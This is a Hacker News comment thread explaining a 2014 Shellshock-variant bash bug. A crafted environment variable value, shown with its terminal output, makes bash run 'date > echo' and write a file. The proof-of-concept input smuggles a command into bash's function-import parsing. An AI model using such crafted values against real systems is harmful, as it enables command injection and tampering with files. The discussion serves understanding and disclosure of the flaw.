Hacker News new | past | comments | ask | show | jobs | submit login

Reproduced from other discussion thread

Try this slight variation:

  $ export X="() { (a)=>\\"
  $ bash -c 'echo date'
  bash: X: line 1: syntax error near unexpected token `='
  bash: X: line 1: `'
  bash: error importing function definition for `X'
  $ cat echo
  Thu Sep 25 02:27:07 UTC 2014
Setting "X" in that way confuses the bash env variable parser. It barfs at the "=" and leaves the ">\" unparsed

AFAICT (without digging deep into the code) that leave in the execution buffer as ">\[NEWLINE]echo date" which gets treated the same as

  date > echo
It causes the command to be interpreted (executed) in a totally different way than it was supposed to, with the nice side effect of modifying files.

See one of my other comments for an example that uses the same flaw to read files.

I don't think anyone has found an RCE path for it yet though.




Thanks, that does entirely clear it up for me: I was missing the obvious (in hindsight):

Under normal circumstances:

  $ bash -c 'echo date'
  date
With this attack, it is not going to print out the actual date, but is actually executing something like

  date > echo:
So what happens then as you and others demonstrated:

  $ export X="() { (a)=>\\"
  $ bash -c 'echo date'
   bash: X: line 1: syntax error near unexpected token `='
   bash: X: line 1: `'
   bash: error importing function definition for `X'

  $ cat echo
   Wed Sep 24 22:38:19 EDT 2014
"echo" is now a file in my current working dir. Definitely fishy business. .. the whole flip flop of echo date to date > echo so easy to miss




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: